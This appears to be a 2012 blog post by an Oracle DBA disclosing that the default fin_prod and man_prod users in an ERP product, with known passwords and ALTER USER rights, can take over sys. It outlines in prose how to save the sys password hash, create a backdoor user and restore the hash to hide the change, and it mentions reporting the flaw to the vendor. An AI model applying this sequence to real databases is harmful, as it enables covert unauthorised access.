Friday, May 25, 2012

Most powerful system privilege on the Oracle database?

On occassion, I read 2600 Magazine (used to have a subscription) and while I don't claim to understand every article discussed, sometimes I come across a gem that pertains to my day-to-day life as a Oracle DBA/Developer. For example, the Fall 2006 issue had a Oracle article that I decided to give a try.

Sure enough, under the standard database configuration that comes with CDC Software's iRennaisance, I was able to expose a flaw in the user security. This system comes with two "master" users: fin_prod and man_prod (finance and manufacturing users). Most everyone knows the built-in passwords for these users so logging on via SQL*Plus is not much trouble.

Once logged in, these two users have a custom role defined by the ERP as GEM_DBA. Within this role, comes the ALTER USER privilege. Using these capabilities it is very easy to change the sys (or system) password. With a little more work, one can also:

  • Capture the existing sys password (in encrypted state)
  • Change the sys password
  • Create a new user
  • Change the sys password back

Now you have created a backdoor user or have easily gained sys dba privileges.

I originally demonstrated the above and posted to the Technology email list for the ERP vendor as very few clients will ever modify these login password or the GEM_DBA Role. Hopefully, someone at CDC addressed this in a future release.

For now, "alter user" is the name of my blog on all things Oracle that I have encountered.